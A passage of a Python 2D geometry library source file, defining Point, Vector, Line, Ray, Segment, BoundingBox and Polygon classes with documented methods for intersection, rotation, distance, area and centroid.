A new `Vector` or `Line` passing through `at_point`
with the components in such a way it is perpendicular with `obj`..
Raises
------
TypeError:
If `obj` is not `Vector` nor `Line`-like or if
`at_point` is not point-like.
"""
if not isinstance(obj, (Vector, Line)):
raise TypeError('Expected vector or line-like, but got: '
'{0} instead.'.format(obj))
if not Point.is_point_like(at_point) and at_point is not None:
raise TypeError('Expected point-like, but got: '
'{0} instead.'.format(at_point))
if isinstance(obj, Line):
# if it's Line-like get the directional vector
obj = obj.v
# this is the Vector defining the direction of the perpendicular
perpendicular_vector = Vector(1, obj.phi + math.pi/2, coordinates='polar')
if Point.is_point_like(at_point):
# if at_point was also provided then return a Line
# passing through that point which is perpendicular to obj
return Line(at_point, perpendicular_vector)
# if not just return the perpendicular_vector
return perpendicular_vector
class GeometricObject(object):
"""
Abstract geometric object class.
It's not meant to be used directly. This only implements methods that
are called on other objects.
"""
def __str__(self, **kwargs):
return '{0}({1})'.format(type(self).__name__, kwargs)
def __contains__(self, x):
"""
Searches for x in "itself". If we're talking about a `Point`
or a `Vector` then this searches within their components (x,
y). For everything else it searches within the list of points
(vertices).
Parameters
----------
x : {point, scalar}
The object to search for.
Returns
-------
out : {True, False}
`True` if we find `x` in `self`, else `False`.
"""
try:
next(i for i in self if i == x)
return True
except StopIteration:
return False
def intersection(self, obj):
"""
Return points of intersection if any.
This method just calls the intersection method on the other objects
that have it implemented.
Parameters
----------
obj : geometric object
`obj` is any object that has intersection implemented.
Returns
-------
ret : {point, None}
The point of intersection if any, if not, just `None`.
"""
return obj.intersection(self)
def translate(self, dx, dy):
"""
Translate `self` by given amounts on x and y.
Parameters
----------
dx, dy : scalar
Amount to translate (relative movement).
"""
if isinstance(self, Polygon):
# we don't want to include the last point since that's also the
# first point and if we were to translate it, it would end up being
# translated two times
sl = slice(0, -1)
else:
sl = slice(None)
for p in self[sl]:
p.translate(dx, dy)
def rotate(self, theta, point=None, angle='degrees'):
"""
Rotate `self` around pivot `point`.
Parameters
----------
theta : scalar
The angle to be rotated by.
point : {point-like}, optional
If given this will be used as the rotation pivot.
angle : {'degrees', 'radians'}, optional
This tells the function how `theta` is passed: as degrees or as
radians. Default is degrees.
"""
polygon_list = None
if isinstance(self, Polygon):
# we don't want to include the last point since that's also the
# first point and if we were to rotate it, it would end up being
# rotated two times
sl = slice(0, -1)
# we are going to create a new Polygon actually after rotation
# since it's much easier to do it this way
polygon_list = []
else:
sl = slice(None)
for p in self[sl]:
# rotate each individual point
p.rotate(theta, point, angle)
if polygon_list is not None:
polygon_list.append(p)
if polygon_list:
# in the case of Polygon we build a new rotated one
self = Polygon(polygon_list)
else:
# in case of other GeometricObjects
self._v = Vector(self.p1, self.p2).normalized
# reset former cached values in self
if hasattr(self, '_cached'):
self._cached = {}
class Point(GeometricObject):
"""
An abstract mathematical point.
It can be built by passing no parameters to the constructor,
this way having the origin coordinates `(0, 0)`, or by passing
a `Point`, a `tuple` or a `list` of length two
or even two scalar values.
Parameters
----------
*args : {two scalars, point-like}, optional
`Point`-like means that it can be either of `tuple` or `list`
of length 2 (see ~`Point.is_point_like`).
Raises
------
TypeError
If the arguments are not the correct type (`Point`, list,
tuple -of length 2- or two values) a `TypeError` is raised.
"""
def __init__(self, *args):
if len(args) == 0:
self._x = 0.
self._y = 0.
elif len(args) == 1:
arg = args[0]
if Point.is_point_like(arg):
self._x = float(arg[0])
self._y = float(arg[1])
if isinstance(arg, Vector):
self._x = arg.x
self._y = arg.y
elif len(args) == 2:
self._x = float(args[0])
self._y = float(args[1])
else:
raise TypeError('The construct needs no arguments, '
'Point, list, tuple (of length 2) or two '
'values, but got instead: {0}'.format(args))
@property
def x(self):
"""[scalar] Get the `x` coordinate."""
return self._x
@property
def y(self):
"""[scalar] Get the `y` coordinate."""
return self._y
def __str__(self):
return super(Point, self).__str__(x=self.x, y=self.y)
def __getitem__(self, idx):
"""
Return values as a `list` for easier acces.
"""
return (self.x, self.y)[idx]
def __len__(self):
"""
The length of a `Point` object is 2.
"""
return 2
def __eq__(self, point):
"""
Equality (==) operator for two points.
Parameters
----------
point : {point-like}
The point to test against.
Returns
-------
res : {True, False}
If the `x` and `y` components of the points are equal then return
`True`, else `False`.
Raises
------
TypeError
In case something other than `Point`-like is given.
"""
if Point.is_point_like(point):
return abs(self.x - point[0]) < UNCERTAINTY and \
abs(self.y - point[1]) < UNCERTAINTY
return False
def __lt__(self, point):
"""
Less than (<) operator for two points.
Parameters
----------
point : {point-like}
The point to test against.
Returns
-------
res : {True, False}
This operator returns `True` if:
1. `self.y` < `point.y`
2. in the borderline case `self.y` == `point.y` then if `self.x` <
`point.x`
Otherwise it returns `False`.
"""
if self.y < point[1]:
return True
if self.y > point[1]:
return False
if self.x < point[0]:
return True
return False
@staticmethod
def is_point_like(obj):
"""
See if `obj` is of `Point`-like.
`Point`-like means `Point` or a list or tuple of
length 2.
Parameters
----------
obj : geometric object
Returns
-------
out : {True, False}
`True` if obj is `Point`-like, else `False`.
"""
if isinstance(obj, Point):
return True
if isinstance(obj, (tuple, list)) and len(obj) == 2:
return True
return False
def is_left(self, obj):
"""
Determine if `self` is left|on|right of an infinite `Line` or
`Point`.
Parameters
----------
obj : {point-like, line-like}
The `GeometricObject` to test against.
Returns
-------
out : {scalar, `None`}
>0 if `self` is left of `Line`,
=0 if `self` is on of `Line`,
<0 if `self` is right of `Line`,
Raises
------
ValueError
In case something else than a `Line`-like or
`Point`-like is given.
"""
if Line.is_line_like(obj):
return ((obj[1][0] - obj[0][0]) * (self.y - obj[0][1]) - \
(self.x - obj[0][0]) * (obj[1][1] - obj[0][1]))
if Point.is_point_like(obj):
return obj[0] - self.x
raise ValueError('Expected a Line or Point, but got: {}'
.format(obj))
def distance_to(self, obj):
"""
Calculate the distance to another `GeometricObject`.
For now it can only calculate the distance to `Line`,
`Ray`, `Segment` and `Point`.
Parameters
----------
obj : geometric object
The object for which to calculate the distance to.
Returns
-------
out : (float, point)
Floating point number representing the distance from
this `Point` to the provided object and the
`Point` of intersection.
"""
if Point.is_point_like(obj):
return ((self.x - obj[0])**2 + (self.y - obj[1])**2)**(.5)
if isinstance(obj, Line):
perpendicular = get_perpendicular_to(obj)
distance_to = abs(perpendicular.x*(self.x - obj.p1.x) + \
perpendicular.y*(self.y - obj.p1.y))
return distance_to
def belongs_to(self, obj):
"""
Check if the `Point` is part of a `GeometricObject`.
This method is actually using the method defined on the passed `obj`.
Returns
-------
out : {True, False}
"""
return obj.has(self)
def translate(self, dx, dy):
"""
See `GeometricObject.translate`.
"""
self._x += dx
self._y += dy
def move(self, x, y):
"""
The difference between this and `translate` is that this
function moves `self` to the given coordinates instead.
"""
self._x = x
self._y = y
def rotate(self, theta, point=None, angle='degrees'):
"""
Rotate `self` by angle theta.
Parameters
----------
theta : scalar
Angle to rotate by. Default in radians (see `angle`).
point : {None, point-like}, optional
Pivot point to rotate against (instead of origin). If not given,
the point will be rotated against origin.
angle : {'radians', 'degrees'}, optional
How is `theta` passed? in radians or degrees.
"""
if angle == 'degrees':
theta = math.radians(theta)
if point is None:
x_new = math.cos(theta) * self.x - math.sin(theta) * self.y
y_new = math.sin(theta) * self.x + math.cos(theta) * self.y
else:
point = Point(point)
x_new = math.cos(theta) * (self.x - point.x) - math.sin(theta) * \
(self.y - point.y) + point.x
y_new = math.sin(theta) * (self.x - point.x) + math.cos(theta) * \
(self.y - point.y) + point.y
self._x = x_new
self._y = y_new
class Vector(GeometricObject):
"""
An abstract `Vector` object.
It's defined by `x`, `y` components or `rho` (length) and `phi` (angle
relative to X axis in radians).
Parameters
----------
*args : {two scalars, vector, point, (list, tuple of length 2)}
Given `coordinates`, `args` compose the vector components. If
the Cartesian coordinates are given, the Polar are calculated and
vice-versa. If `args` is of `Vector` type then all of the
other arguments are ignored and we create a `Vector` copy of
the given parameter. It can also be `Point`-like element; if
there are two `Point`-like elements given then the vector will
have `rho` equal to the distance between the two points and the
direction of point1 -> point2 (i.e. args[0] -> args[1]). If only one
`Point`-like is given then this object's `x` and `y` values
are used, having obviously the direction ``Point(0, 0)`` -> ``Point(x,
y)``.
**kwargs : coordinates={"cartesian", "polar"}, optional
If `cartesian` then `arg1` is `x` and `arg2` is `y` components, else
if `polar` then `arg1` is rho and `arg2` is `phi` (in radians).
Raises
------
TypeError
In case `args` is not the correct type(`Vector`, two scalars
or point-like).
"""
def __init__(self, *args, **kwargs):
coordinates = kwargs.get('coordinates', 'cartesian')
if len(args) == 1:
if isinstance(args[0], Vector):
self._x = args[0].x
self._y = args[0].y
self._rho = args[0].rho
self._phi = args[0].phi
if Point.is_point_like(args[0]):
self._x = args[0][0]
self._y = args[0][1]
self._calculate_polar_coords()
elif len(args) == 2:
if Point.is_point_like(args[0]) and Point.is_point_like(args[1]):
self._x = args[1][0] - args[0][0]
self._y = args[1][1] - args[0][1]
self._calculate_polar_coords()
return
if coordinates is 'cartesian':
self._x = args[0]
self._y = args[1]
self._calculate_polar_coords()
if coordinates is 'polar':
self._rho = args[0]
self._phi = u.float_to_2pi(args[1])
self._calculate_cartesian_coords()
else:
raise TypeError('The constructor needs vector, point-like or '
'two numbers, but instead it was given: '
'{0}'.format(args))
@property
def x(self):
"""[scalar] Get the x component of the `Vector`."""
return self._x
@property
def y(self):
"""[scalar] Get the y component of the `Vector`."""
return self._y
@property
def rho(self):
"""[scalar] Get the length of the `Vector` (polar coordinates)."""
return self._rho
@property
def phi(self):
"""
[scalar] Get the angle (radians).
Get the angle (in radians) of the `Vector` with the X axis
(polar coordinates). `phi` will always be mapped to ``[0, 2PI)``.
"""
return self._phi
@u.cached_property
def normalized(self):
"""
[Vector] Get a normalized `self`.
"""
return Vector(1, self.phi, coordinates='polar')
def __str__(self):
return super(Vector, self).__str__(x=self.x, y=self.y, rho=self.rho,
phi=math.degrees(self.phi))
def __getitem__(self, idx):
"""
Return values as a list for easier acces some times.
"""
return (self.x, self.y)[idx]
def __len__(self):
"""
The length of a `Vector` is 2.
"""
return 2
def __neg__(self):
"""
Turns `self` to 180 degrees and returns the new `Vector`.
Returns
-------
out : vector
Return a new `Vector` with same `self.rho`, but
`self.phi`-`math.pi`.
"""
return Vector(-self.x, -self.y)
def __mul__(self, arg):
"""
Calculates the dot product with another `Vector`, or
multiplication by scalar.
For more details see `dot`.
"""
return self.dot(arg)
def __add__(self, vector):
"""
Add two vectors.
Parameters
----------
vector : vector
The vector to be added to `self`.
Returns
-------
A new vector with components ``self.x + vector.x``,
``self.y + vector.y``.
"""
return Vector(self.x + vector.x, self.y + vector.y)
def __sub__(self, vector):
"""
Subtraction of two vectors.
It is `__add__` passed with turnerd round vector.
"""
return self.__add__(-vector)
def _calculate_polar_coords(self):
"""
Helper function for internally calculating `self.rho` and `self.phi`.
"""
# calculate the length of the vector and store it in self.rho
self._rho = Point(0, 0).distance_to(Point(self.x, self.y))
# we now calculate the angle with the X axis
self._phi = math.atan2(self.y, self.x)
if self.phi < 0:
self._phi += 2*math.pi
def _calculate_cartesian_coords(self):
"""
Helper function for internally calculating `self.x` and `self.y`.
Raises
------
ValueError
In case self.phi is outside of the interval ``[0, 2PI)`` an
`Exception` is raised.
"""
self._x = self.rho * math.cos(self.phi)
self._y = self.rho * math.sin(self.phi)
@staticmethod
def random_direction():
"""
Create a randomly oriented `Vector` (with `phi` in the
interval ``[0, PI)``) and with unit length.
Returns
-------
out : vector
A `Vector` with random orientation in positive Y direction
and with unit length.
"""
return Vector(1, random.random()*math.pi, coordinates='polar')
def dot(self, arg):
"""
Calculates the dot product with another `Vector`, or
multiplication by scalar.
Parameters
----------
arg : {scalar, vector}
If it's a number then calculates the product of that number
with this `Vector`, if it's another `Vector`
then it will calculate the dot product.
Returns
-------
res : {float, vector}
Take a look at the parameters section.
Raises
------
TypeError
In case `arg` is not number or `Vector`.
"""
if isinstance(arg, Vector):
# if arg is Vector then return the dot product
return self.x * arg.x + self.y * arg.y
elif isinstance(arg, (int, float)):
# if arg is number return a Vector multiplied by that number
return Vector(self.x * arg, self.y * arg)
# if arg is not the correct type then raise TypeError
raise TypeError('Expected a vector or number, but got '.format(arg))
def cross(self, arg):
"""
Calculates the cross product with another `Vector`, as defined
in 2D space (not really a cross product since it gives a scalar, not
another `Vector`).
Parameters
----------
arg : vector
Another `Vector` to calculate the cross product with.
Returns
-------
res : float
Take a look at the parameters section.
Raises
------
TypeError
In case `arg` is not a `Vector`.
"""
if isinstance(arg, Vector):
return self.x * arg.y - self.y * arg.x
raise TypeError('Expected a vector, but got '.format(arg))
def parallel_to(self, obj):
"""
Is `self` parallel with `obj`?
Find out if this `Vector` is parallel with another object
(`Vector` or `Line`-like). Since we are in a 2D
plane, we can use the geometric interpretation of the cross product.
Parameters
----------
obj : {vector, line-like}
The object to be parallel with.
Returns
-------
res : {True, False}
If it's parallel return `True`, else `False`.
"""
if isinstance(obj, Line):
obj = obj.v
return abs(self.cross(obj)) < UNCERTAINTY
def perpendicular_to(self, obj):
"""
Is `self` perpendicular to `obj`?
Find out if this `Vector` is perpendicular to another object
(`Vector` or `Line`-like). If the dot product
between the two vectors is 0 then they are perpendicular.
Parameters
----------
obj : {vector, line-like}
The object to be parallel with.
Returns
-------
res : {True, False}
If they are perpendicular return `True`, else `False`.
"""
if isinstance(obj, Line):
obj = obj.v
return self * obj == 0
def translate(*args):
"""Dummy function since it doesn't make sense to translate a
`Vector`."""
pass
def rotate(self, theta, angle='degrees'):
"""
Rotate `self` by `theta` degrees.
Properties
----------
theta : scalar
Angle by which to rotate.
angle : {'degrees', 'radians'}, optional
Specifies how `theta` is given. Default is degrees.
"""
if angle == 'degrees':
theta = math.radians(theta)
self.phi += theta
self._calculate_cartesian_coords()
class BoundingBox(GeometricObject):
"""
Represents the far extremeties of another `GeometricObject`
(except for `Vector`).
It is totally defined by two points. For convenience it also has `left`,
`top`, `right` and `bottom` attributes.
Parameters
----------
obj : geometric object
The object for which to assign a `BoundingBox`.
"""
def __init__(self, obj):
if not isinstance(obj, GeometricObject) or isinstance(obj, Vector):
raise TypeError('The argument must be of type GeometricObject '
'(except for Vector), but got {} instead'
.format(obj))
# make min the biggest values possible and max the minimum
xs = [point.x for point in obj]
ys = [point.y for point in obj]
self._left = min(xs)
self._top = max(ys)
self._right = max(xs)
self._bottom = min(ys)
self._p1 = Point(self.bottom, self.left)
self._p2 = Point(self.top, self.right)
self._width = abs(self.right - self.left)
self._height = abs(self.top - self.bottom)
@property
def left(self):
"""[scalar]"""
return self._left
@property
def top(self):
"""[scalar]"""
return self._top
@property
def right(self):
"""[scalar]"""
return self._right
@property
def bottom(self):
"""[scalar]"""
return self._bottom
@property
def p1(self):
"""
(point-like) Get the bottom-left `Point`.
"""
return self._p1
@property
def p2(self):
"""
(point-like) Get the top-right `Point`.
"""
return self._p2
@property
def width(self):
"""[scalar]"""
return self._width
@property
def height(self):
"""[scalar]"""
return self._height
def __str__(self):
return super(BoundingBox, self).__str__(left=self.left, top=self.top,
right=self.right,
bottom=self.bottom,
p1=str(self.p1),
p2=str(self.p2))
def __getitem__(self, idx):
"""
Get points through index.
Parameters
----------
idx : scalar
The index of the `Point`.
Returns
-------
out : point
The selected `Point` through the provided index.
"""
return (self.p1, self.p2)[idx]
def __len__(self):
"""
The `BoundingBox` is made of 2 points so it's length is 2.
"""
return 2
class Line(GeometricObject):
"""
An abstract mathematical `Line`.
It is defined by either two points or by a `Point` and a
`Vector`.
Parameters
----------
arg1 : point-like
The passed in parameters can be either two points or a `Point`
and a `Vector`. For more on `Point`-like see the
`Point` class.
arg2 : {point-like, vector}
If a `Vector` is given as `arg2` instead of a
`Point`-like, then `p2` will be calculated for t = 1 in the
vectorial definition of the line (see notes).
See Also
--------
Point, Vector
Notes
-----
A line can be defined in three ways, but we use here only the vectorial
definition for which we need a `Point` and a `Vector`.
If two points are given the `Vector`
:math:`\\boldsymbol{\mathtt{p_1p_2}}` will be calculated and then we can
define the `Line` as:
.. math::
\\boldsymbol{r} = \\boldsymbol{r_0} + t \cdot
\\boldsymbol{\mathtt{p_1p_2}}
Here :math:`t` is a parameter.
"""
def __init__(self, arg1, arg2):
if Point.is_point_like(arg1) and Point.is_point_like(arg2):
# detect if arguments are of type Point-like, if so
# store them and calculate the directional Vector
self._p1, self._p2 = Point(arg1), Point(arg2)
self._v = Vector(self.p1, self.p2).normalized
else:
# if we have instead a Point and a Vector just calculate
# self.p2
self._p1, self._v = Point(arg1), arg2.normalized
self._p2 = Point(self.p1.x + self.v.x, self.p1.y + self.v.y)
@property
def p1(self):
"""
[point] Get the 1st `Point` that defines the `Line`.
"""
return self._p1
@property
def p2(self):
"""
[point] Get the 2nd `Point` that defines the `Line`.
"""
return self._p2
@property
def v(self):
"""
[vector] Get the `Vector` pointing from `self.p1` to`self.p2`.
"""
return self._v
@property
def phi(self):
"""
[scalar] Get `self.v.phi`. Convenience method.
"""
return self.v.phi
def __str__(self, **kwargs):
return super(Line, self).__str__(v=str(self.v),
p1=str(self.p1), p2=str(self.p2),
**kwargs)
def __getitem__(self, idx):
"""
Get the points that define the `Line` by index.
Parameters
----------
idx : scalar
The index for `Point`.
Returns
-------
ret : point
Selected `Point` by index.
"""
return (self.p1, self.p2)[idx]
def __len__(self):
"""The `Line` is made of 2 points so it's length is 2.'"""
return 2
@staticmethod
def is_line_like(obj):
"""
Check if an object is in the form of `Line`-like for fast
computations (not necessary to build lines).
Parameters
----------
obj : anything
`obj` is checked if is of type `Line` (i.e. not `Ray` nor
`Segment`) or if this is not true then of the form: ((0, 1),
(3, 2)) or [[0, 2], [3, 2]] or even combinations of these.
Returns
-------
res : {True, False}
"""
if type(obj) == Line or (all(len(item) == 2 for item in obj) and \
len(obj) == 2):
return True
return False
def intersection(self, obj):
"""
Find if `self` is intersecting the provided object.
If an intersection is found, the `Point` of intersection is
returned, except for a few special cases. For further explanation
see the notes.
Parameters
----------
obj : geometric object
Returns
-------
out : {geometric object, tuple}
If they intersect then return the `Point` where this
happened, else return `None` (except for `Line` and
`Polygon`: see notes).
Raises
------
TypeError
If argument is not geometric object then a `TypeError` is raised.
Notes
-----
* `Line`: in case `obj` is `Line`-like and `self`
then `self` and the `Line` defined by `obj` are checked for
colinearity also in which case `geo2d_utils.inf` is returned.
* `Polygon`: in the case of intersection with a
`Polygon` a tuple of tuples is returned. The nested tuple is
made up by the index of the intersected side and intersection point
(e.g. ``((intersection_point1, 1), ( intersection_point2, 4))`` where
`1` is the first intersected side of the `Polygon` and `4`
is the second one). If the `Line` doesn't intersect any
sides then `None` is returned as in the usual case.
"""
if isinstance(obj, Line):
self_p1 = Vector(self.p1)
obj_p1 = Vector(obj.p1)
denominator = self.v.cross(obj.v)
numerator = (obj_p1 - self_p1).cross(self.v)
if abs(denominator) < UNCERTAINTY:
# parallel lines
if abs(numerator) < UNCERTAINTY:
# colinear lines
return u.inf
return None
# calculate interpolation parameter (t): Vector(obj.p1) + obj.v * t
t = numerator/denominator
intersection_point = Point(obj_p1 + obj.v * t)
if type(obj) is Ray:
# in case it's a Ray we restrict the values to [0, inf)
if not (t >= UNCERTAINTY):
return None
if type(obj) is Segment:
# and for Segment we have values in the
# interval [0, obj.p1.distance_to(obj.p2)]
if not (UNCERTAINTY <= t <= obj.p1.distance_to(obj.p2) - \
UNCERTAINTY):
return None
return intersection_point
if isinstance(obj, Polygon):
# if it's a Polygon traverse all the edges and return
# the intersections as a list of items. The first element in
# one item is the intersection Point and the second element in
# the item is the edge's number
intersections = []
for idx, side in enumerate(obj.edges):
intersection_point = self.intersection(side)
if intersection_point is None or \
intersection_point == u.inf:
continue
if intersections and intersection_point == intersections[-1][0]:
continue
intersections.append([intersection_point, idx])
# if there are no intersections return the usual None
return intersections or None
raise TypeError('Argument needs to be geometric object, but '
'got instead: {0}'.format(obj))
def has(self, point):
"""
Inspect if `point` (`Point`-like) is part of this `Line`.
Parameters
----------
point : point-like
The `Point` to test if it's part of this `Line`.
Returns
-------
ret : {True, False}
If it's part of this `Line` then return True, else False.
See also
--------
Line.intersection, Ray.has, Segment.has
"""
# if the intersection failes then the object is not
# on this Line
# create a Vector from p1 to the point of interest
# if this Vector is parallel to our direction Vector
# then it is on the Line, if not, it's not on the Line
vector = Vector(self.p1, point)
return vector.parallel_to(self)
def perpendicular_to(self, obj):
"""
Find out if provided `Line` is perpendicular to `self`.
Returns
-------
ret : {True, False}
"""
if isinstance(obj, Line):
obj = obj.v
return self.v.perpendicular_to(obj)
def parallel_to(self, obj):
"""
Find out if provided `Vector` or `Line`-like is
parllel to `self`.
Parameters
----------
obj : {vector, line-like}
The `Vector` or `Line`-like to compare
parallelism with.
Returns
-------
ret : {True, False}
If `self` and `Line` are parallel then retrun `True`,
else `False`.
"""
if isinstance(obj, Line):
obj = obj.v
return self.v.parallel_to(obj)
class Ray(Line):
"""
A `Ray` extension on `Line`.
The only difference is that this has a starting `Point` (`p1`)
which represents the end of the `Ray` in that direction.
Parameters
----------
arg1 : point-like
The passed in parameters can be either two points or a `Point`
and a `Vector` For more on `Point`-like see the
`Point` class.
arg2 : {point-like, vector}
See `arg1`.
See also
--------
Line, Segment, Vector
"""
def intersection(self, obj):
"""
Tries to find the `Point` of intersection.
The difference between this and the `Line` intersection method
is that this has also the constrain that if the `Point` of
intersection is on the line then it also must be within the
bounds of the `Ray`.
Parameters
----------
obj : geometric object
Returns
-------
out : {gometric object, None}
`GeometricObject` if intersection is possible, else the
cases from `Line`.intersection.
See also
--------
Line.intersection, Segment.intersection
"""
# if we're not dealing with a Line-like then skin the parent
# intersection method
if type(obj) is Line:
return obj.intersection(self)
intersections = super(Ray, self).intersection(obj)
if isinstance(obj, Polygon):
if intersections:
intersections = [item for item in intersections \
if self.has(item[0])]
return intersections
if intersections and intersections != u.inf:
if abs(self.p1.x - self.p2.x) < UNCERTAINTY:
# vertical line
r = (intersections.y - self.p1.y) / self.v.y
else:
r = (intersections.x - self.p1.x) / self.v.x
if not (r >= UNCERTAINTY):
return None
return intersections
def has(self, point):
"""
Check if `point` is part of `self`.
Parameters
----------
point : point-like
The `Point` to check.
Returns
-------
ret : {True, False}
If the point is on the `Ray` then return `True`, else
`False`.
See also
--------
Ray.intersection, Line.has, Segment.has
"""
if super(Ray, self).has(point):
p1_to_point = Vector(self.p1, point)
return p1_to_point * self.v >= UNCERTAINTY
class Segment(Line):
"""
An extension on `Line`.
This class emposes the `length` property on a `Line`. A
`Segment` is a finite `Line`.
Parameters
----------
arg1 : point-like
The passed in parameters can be either two points or a `Point`
and a `Vector` For more on `Point`-like see the `Point` class.
arg2 : {point-like, vector}
See `arg1`.
Raises
------
ValueError
If length is less than or equal to 0.
See also
--------
Line, Ray, Vector
"""
@u.cached_property
def length(self):
"""
[scalar] Get the length of the `Segment`.
I.e. the distance from `self.p1` to `self.p2`.
"""
return self.p1.distance_to(self.p2)
@u.cached_property
def bounding_box(self):
"""
[BoundingBox] get the `BoundingBox` of `self`.
"""
return BoundingBox(self)
def __str__(self):
return super(Segment, self).__str__(length=self.length)
def intersection(self, obj):
"""
Tries to find the `Point` of intersection.
The difference between this and the `Line` intersection method
is that this has also the constrain that if the `Point` of
intersection is on the line then it also must be within the
bounds of the `Segment`.
Parameters
----------
obj : geometric object
Returns
-------
out : {gometrical object, None}
`GeometricObject` if intersection is possible, else the
cases from `Line`.intersection.
See also
--------
Line.intersection, Ray.intersection
"""
# in case we need to check for another geometricObject
if type(obj) is Line:
return obj.intersection(self)
intersections = super(Segment, self).intersection(obj)
if isinstance(obj, Polygon):
if intersections:
intersections = [item for item in intersections \
if self.has(item[0])]
return intersections
if intersections and intersections != u.inf:
if abs(self.p1.x - self.p2.x) < UNCERTAINTY:
# vertical line
r = (intersections.y - self.p1.y) / self.v.y
else:
r = (intersections.x - self.p1.x) / self.v.x
if not (UNCERTAINTY <= r <= self.p1.distance_to(self.p2) - \
UNCERTAINTY):
return None
return intersections
def has(self, point):
"""
Check if `point` is part of `self`.
Parameters
----------
point : point-like
The point to check.
Returns
-------
ret : {True, False}
If the point is on the `Ray` then return `True`, else
`False`.
See also
--------
Segment.intersection, Line.has, Ray.has
"""
if super(Segment, self).has(point):
p1_to_point = self.p1.distance_to(point)
p2_to_point = self.p2.distance_to(point)
return p1_to_point + p2_to_point - self.length < UNCERTAINTY
def get_point_on_self(self, frac=None):
"""
Get a point on this `Segment` based on `frac`.
If no argument is given then the `Point` on the
`Segment` will be placed randomly.
Parameters
----------
frac : float, optional
If `frac` is given then the new `Point`'s position will
be relative to the length of the `Segment` and to the
first `Point` (`self.p1`). `frac` can be only in the
interval (0, 1).
Returns
-------
out : point
The new `Point`'s position on the `Segment`.
Raises
------
ValueError
If `frac` is outside the open interval (0, 1) then
a `ValueError` is raised.
"""
# if no argument is given then return an arbitrary
# location Point on this Segment
frac = frac or UNCERTAINTY + random.random()*(1 - UNCERTAINTY)
# if frac is outside the open interval (0, 1)
if not (0 < frac < 1):
raise ValueError('The argument (frac) cannot be '
'outside of the open interval (0, 1), '
'got: {0}'.format(frac))
# calculate the displacement relative to the
# first Point
dx = (self.p2.x - self.p1.x) * frac
dy = (self.p2.y - self.p1.y) * frac
# calculate the location of the new Point on
# the Segment
new_x = self.p1.x + dx
new_y = self.p1.y + dy
return Point(new_x, new_y)
class Polygon(GeometricObject):
"""
A general (closed) `Polygon` class.
The `Polygon` is made out of points (vertices of type
`Point`) and edges (`Segment`). It can be created by
passing a list of `Point`-like objects.
Parameters
----------
vertices : {list/tuple of point-like}
The `list` of `Point`-like objects that make the
`Polygon`. The `self.edges` of the `Polygon` are
automatically created and stored. If the length of the `vertices` list
is < 3 this cannot be a `Polygon` and a `ValueError` will be
raised.
Raises
------
ValueError
In case length of the `vertices` `list` is smaller than 3.
"""
def __init__(self, vertices):
if len(vertices) < 3:
raise ValueError('List of points cannot have less than 3 '
'elements')
self._vertices = [Point(point) for point in vertices]
# this is for internal use only
# first initialize to None so that area property can check for it
self._diameter = None
self._width = None
self._area = None
# setup self._area at this point (with signs)
self.area
if self._area < 0:
# the vertices are in clockwise order so set them
# in counterclockwise order
self.vertices.reverse()
# change the sign of the area appropriately
self._area = -self._area
# now select the lowest (and left if equal to some other)
# and make it the first vertex in the Polygon
lowest_idx = self._vertices.index(min(self._vertices))
# rotate such that the lowset (and left) most vertex is the first one
self._vertices = u.rotated(self._vertices, -lowest_idx)
# and add the first vertex to the list at the end for further processing
self._vertices += [self._vertices[0]]
self._edges = [Segment(p1, p2) for p1, p2 in \
zip(self._vertices[:-1],
self._vertices[1:])]
@property
def vertices(self):
"""
[list of points] Get the `vertices`.
The list of `Point`-like objects that make up the
`Polygon`. It's lengths cannot be less than 3.
"""
return self._vertices
@property
def edges(self):
"""
[list of segments] Get the `edges`, that is the segments.
These are the `edges` of the `Polygon`, which are
defined by the list of vertices. The `Polygon` is considered
to be closed (ie. the last segment is defined by points `pn` and `p1`).
"""
return self._edges
@property
def area(self):
"""
[scalar] Get the (positive) area of this `Polygon`.
Using the standard formula [WPolygon]_ for the area of a `Polygon`:
.. math::
A &= \\frac{1}{2} \\sum_{i=0}^{n-1} (x_iy_{i+1} - x_{i+1}y_i)
:math:`A` can be negative depending on the orientation of the `Polygon`
but this property always returns the positive value.
Notes
-----
This function (property) also sets up `self._area` if it's not set.
This variable (`self._area`) is meant to be just for internal use (at
least for now).
"""
# first add the first vertex to the list
if self._area is None:
vertices = self.vertices + [self.vertices[0]]
self._area = 1/2. * sum([v1.x*v2.y - v2.x*v1.y for v1, v2 in \
zip(vertices[:-1], vertices[1:])
])
return abs(self._area)
@u.cached_property
def bounding_box(self):
"""
[BoundingBox] Get `BoundingBox` of `self`.
"""
return BoundingBox(self)
@property
def bbox_width(self):
"""
[scalar] Get `self.bounding_box.width`.
"""
return self.bounding_box.width
@property
def bbox_height(self):
"""
[scalar] Get `self.bounding_box.height`.
"""
return self.bounding_box.height
@property
def diameter(self):
"""
[scalar] Get the `diameter` of the `Polygon`.
Refer to `_compute_diameter_width` for details on how this is
calculated.
See also
--------
Polygon.diameter, Polygon._compute_diameter_width
"""
if self._diameter is None:
self._diameter, self._width = self._compute_diameter_width()
return self._diameter
@property
def width(self):
"""
[scalar] Get the `width` of the `Polygon`.
Refer to `_compute_diameter_width` for details on how this is
calculated.
See also
--------
Polygon.diameter, Polygon._compute_diameter_width
"""
if self._width is None:
self._diameter, self._width = self._compute_diameter_width()
return self._width
@u.cached_property
def centroid(self):
"""
[Point] Get the centroid (`Point`) of the `Polygon`.
Defined as [WPolygon]_:
.. math::
C_x &= \\frac{1}{6A} \\sum_{i=0}^{i=n-1}(x_i + x_{i+1})
(x_iy_{i+1}-x_{i+1}y_i)
C_y &= \\frac{1}{6A} \\sum_{i=0}^{i=n-1}(y_i + y_{i+1})
(x_iy_{i+1}-x_{i+1}y_i)
where :math:`A` is the area using the standard formula for a `Polygon`
[WPolygon]_ so it can take negative values.
"""
vertices = self.vertices + [self.vertices[0]]
x = 1/(6.*self._area) * \
sum([(v1.x + v2.x)*(v1.x*v2.y - v2.x*v1.y) for v1, v2 in \
zip(vertices[:-1], vertices[1:])])
y = 1/(6.*self._area) * \
sum([(v1.y + v2.y)*(v1.x*v2.y - v2.x*v1.y) for v1, v2 in \
zip(vertices[:-1], vertices[1:])])
return Point(x, y)
def __str__(self):
return super(Polygon, self).__str__(vertices=[str(v)
for v in self.vertices[:-1]])
def __getitem__(self, idx):
"""
Retreive points (`self.vertices`) by `idx`.
Parameters
----------
idx : scalar
The index of the `Point` (`vertex`).
Returns
-------
ret : point
The `vertex` by index.
"""
return self.vertices[idx]
def __len__(self):
"""
The length of the `Polygon` is defined by the length of the
`self.vertices` list.
"""
return len(self.vertices)
def _compute_diameter_width(self):
"""
Compute the `diameter` and `width` of the `Polygon`.
This is meant for internal use only. The `diameter` is defined by the
